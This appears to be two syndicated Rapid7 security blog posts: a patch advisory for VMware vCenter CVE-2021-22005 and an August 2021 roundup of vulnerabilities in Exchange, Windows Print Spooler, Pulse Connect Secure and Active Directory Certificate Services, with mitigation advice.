On Tuesday, September 21, 2021, VMware published security advisory VMSA-2021-0020, which includes details on CVE-2021-22005, a critical file upload vulnerability (CVSSv3 9.8) in vCenter Server that allows remote code execution (RCE) on the appliance. Successful exploitation of this vulnerability is achieved simply by uploading a specially crafted file via port 433 “regardless of the configuration settings of vCenter Server.”

VMware has published an FAQ outlining the details of this vulnerability and makes it clear that this should be patched “immediately.” A workaround is also being provided by VMware — however, its use is not being recommended and should only be used as a temporary solution.

Affected products

  • vCenter Server versions 6.7 and 7.0
  • Cloud Foundation (vCenter Server) 3.x, 4.x

Guidance

We echo VMware’s advice that impacted servers should be patched right away. While there are currently no reports of exploitation, we expect this to quickly change within days — just as previous critical vCenter vulnerabilities did (CVE-2021-21985, CVE-2021-21972). Additionally, Rapid7 recommends that, as a general practice, network access to critical organizational infrastructure only be allowed via VPN and never open to the public internet.

We will update this post as more information becomes available, such as information on exploitation.

Rapid7 customers

A vulnerability check for CVE-2021-22005 is under development and will be available to InsightVM and Nexpose customers in an upcoming content release pending the QA process.

In the meantime, InsightVM customers can use Query Builder to find assets that have vCenter Server installed by creating the following query: software.description contains vCenter Server. Rapid7 Nexpose customers can create a Dynamic Asset Group based on a filtered asset search for Software name contains vCenter Server.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Popular Attack Surfaces, August 2021: What You Need to Know

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/

Popular Attack Surfaces, August 2021: What You Need to Know

Whether you attended virtually, IRL, or not at all, Black Hat and DEF CON have officially wrapped, and security folks’ brains are replete with fresh information on new (and some not-so-new) vulnerabilities and exploit chains. The “hacker summer camp” conferences frequently also highlight attack surface area that may not be net-new — but that is subjected to renewed and redoubled community interest coming out of Vegas week. See Rapid7’s summaries here and here.

Here’s the specific attack surface area and a few of the exploit chains we’re keeping our eye on right now:

  • Orange Tsai stole the show (as always) at Black Hat with a talk on fresh Microsoft Exchange attack surface area. All in all, Orange discussed CVEs from what appears to be four separate attack chains —including the ProxyLogon exploit chain that made headlines when it hit exposed Exchange servers as a zero-day attack back in March and the “ProxyShell” exploit chain, which debuted at Pwn2Own and targets three now-patched CVEs in Exchange. Exchange continues to be a critically important attack surface area, and defenders should keep patched on a top-priority or zero-day basis wherever possible.
  • Print spooler vulnerabilities continue to cause nightmares. DEF CON saw the release of new privilege escalation exploits for Windows Print Spooler, and Black Hat featured a talk by Sangfor Technologies researchers that chronicled both new Windows Print Spooler vulnerabilities and past patch bypasses for vulns like CVE-2020-1048 (whose patch was bypassed three times). Given that many defenders are still trying to remediate the “PrintNightmare” vulnerability from several weeks ago, it’s fair to say that Windows Print Spooler will remain an important attack surface area to prioritize in future Patch Tuesdays.
  • There’s also a new vulnerability in Pulse Connect Secure VPNs that caught our attention — the vuln is actually a bypass for CVE-2020-8260, which came out last fall and evidently didn’t completely fade away — despite the fact that it’s authenticated and requires admin access. With CISA’s warnings about APT attacks against Pulse Connect Secure devices, it’s probably wise to patch CVE-2021-22937 quickly.
  • And finally, the SpecterOps crew gave a highly anticipated Black Hat talk on several new attack techniques that abuse Active Directory Certificate Services — something we covered previously in our summary of the PetitPotam attack chain. This is neat research for red teams, and it may well show up on blue teams’ pentest reports.

Microsoft Exchange ProxyShell chain

Patches: Available
Threat status: Possible threat (at least one report of exploitation in the wild)

It goes without saying that Microsoft Exchange is a high-value, popular attack surface that gets constant attention from threat actors and researchers alike. That attention is increasing yet again after prominent security researcher Orange Tsai gave a talk at Black Hat USA last week revealing details on an attack chain first demonstrated at Pwn2Own. The chain, dubbed “ProxyShell,” allows an attacker to take over an unpatched Exchange server. ProxyShell is similar to ProxyLogon (i.e., CVE-2021-26855 and CVE-2021-27065), which continues to be popular in targeted attacks and opportunistic scans despite the fact that it was patched in March 2021.

Two of the three vulnerabilities used for ProxyShell were patched in April by Microsoft and the third was patched in July. As of August 9, 2021, private exploits have already been developed, and it’s probably only a matter of time before public exploit code is released, which may allow for broader exploitation of the vulns in this attack chain (in spite of its complexity!). Rapid7 estimates that there are, at least, nearly 75,000 ProxyShell-vulnerable exchange servers online:

Popular Attack Surfaces, August 2021: What You Need to Know

We strongly recommend that Exchange admins confirm that updates have been applied appropriately; if you haven’t patched yet, you should do so immediately on an emergency basis.

One gotcha when it comes to Exchange administration is that Microsoft only releases security fixes for the most recent Cumulative Update versions, so it’s vital to stay up to date with these quarterly releases in order to react quickly when new patches are published.

ProxyShell CVEs:

Windows Print Spooler — and more printer woes

Patches: Varies by CVE, mostly available
Threat status: Varies by CVE, active and impending

The Windows Print Spooler was the subject of renewed attention after the premature disclosure of the PrintNightmare vulnerability earlier this summer, followed by new Black Hat and DEF CON talks last week. Among the CVEs discussed were a quartet of 2020 vulns (three of which were bypasses descended from CVE-2020-1048, which has been exploited in the wild since last year), three new remote code execution vulnerabilities arising from memory corruption flaws, and two new local privilege escalation vulnerabilities highlighted by researcher Jacob Baines. Of this last group, one vulnerability — CVE-2021-38085 — remains unpatched.

On August 11, 2021, Microsoft assigned CVE-2021-36958 to the latest Print Spooler remote code execution vulnerability which appears to require local system access and user interaction. Further details are limited at this time. However, as mitigation, Microsoft is continuing to recommend stopping and disabling the Print Spooler service. Even after this latest zero-day vulnerability is patched, we strongly recommend leaving the Print Spooler service disabled wherever possible. Read Rapid7’s blog on PrintNightmare for further details and updates.

Windows Print Spooler and related CVEs:

  • CVE-2020-1048 (elevation of privilege vuln in Windows Print Spooler presented at Black Hat 2020; exploited in the wild, Metasploit module available)
  • CVE-2020-1337 (patch bypass for CVE-2020-1048; Metasploit module available)
  • CVE-2020-17001 (patch bypass variant for CVE-2020-1048)
  • CVE-2020-17014 (patch bypass variant for CVE-2020-1048)
  • CVE-2020-1300 (local privilege escalation technique known as “EvilPrinter” presented at DEF CON 2020)
  • CVE-2021-24088 (new remote code execution vulnerability in the Windows local spooler, as presented at Black Hat 2021)
  • CVE-2021-24077 (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)
  • CVE-2021-1722 (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)
  • CVE-2021-1675 (elevation of privilege vuln in Windows Print Spooler patched in June 2021)
  • CVE-2021-34527, aka “PrintNightmare”
  • CVE-2021-35449 (print driver local privilege escalation vulnerability, as presented at DEF CON 2021; Metasploit module in progress)
  • CVE-2021-38085 (unpatched print driver local privilege escalation vulnerability, as presented at DEF CON 2021; Metasploit module in progress)
  • CVE-2021-36958 (unpatched remote code execution vulnerability; announced August 11, 2021)

Currently, both PrintNightmare CVE-2021-34527 and CVE-2020-1048 are known to be exploited in the wild. As the list above demonstrates, patching print spooler and related vulns quickly and completely has been a challenge for Microsoft for the past year or so. The multi-step mitigations required for some vulnerabilities also give attackers an advantage. Defenders should harden printer setups wherever possible, including against malicious driver installation.

Pulse Connect Secure CVE-2021-22937

Patch: Available
Threat status: Impending (Exploitation expected soon)

On Monday, August 2, 2021, Ivanti published Security Advisory SA44858 which, among other fixes, includes a fix for CVE-2021-22937 for Pulse Connect Secure VPN Appliances running 9.1R11 or prior. Successful exploitation of this vulnerability, which carries a CVSSv3 score of 9.1, requires the use of an authenticated administrator account to achieve remote code execution (RCE) as user root.

Public proof-of-concept (PoC) exploit code has not been released as of this writing. However, this vulnerability is simply a workaround for CVE-2020-8260, an authentication bypass vulnerability that was heavily utilized by attackers, released in October 2020.

The Cybersecurity and Infrastructure Security Agency (CISA) has been monitoring the Exploitation of Pulse Connect Secure Vulnerabilities demonstrating that attackers have been targeting Ivanti Pulse Connect Secure products for over a year. Due to attacker focus on Pulse Connect Secure products, and especially last year’s CVE-2020-8260, Rapid7 recommends patching CVE-2021-22937 as soon as possible.

PetitPotam: Windows domain compromise

Patches: Available
Threat status: Threat (Exploited in the wild)

In July 2021, security researcher Topotam published a PoC implementation of a novel NTLM relay attack christened “PetitPotam.” The technique used in the PoC allows a remote, unauthenticated attacker to completely take over a Windows domain with the Active Directory Certificate Service (AD CS) running — including domain controllers. Rapid7 researchers have tested public PoC code against a Windows domain controller setup and confirmed exploitability. One of our senior researchers summed it up with: "This attack is too easy." You can read Rapid7’s full blog post here.

On August 10, 2021, Microsoft released a patch that addresses the PetitPotam NTLM relay attack vector in today’s Patch Tuesday. Tracked as CVE-2021-36942, the August 2021 Patch Tuesday security update blocks the affected API calls OpenEncryptedFileRawA and OpenEncryptedFileRawW through the LSARPC interface. Windows administrators should prioritize patching domain controllers and will still need to take additional steps listed in KB5005413 to ensure their systems are fully mitigated.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to the vulnerabilities in this post with authenticated vulnerability checks. Please note that details haven’t yet been released on CVE-2021-38085 and CVE-2021-36958; therefore, it’s still awaiting analysis and check development.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.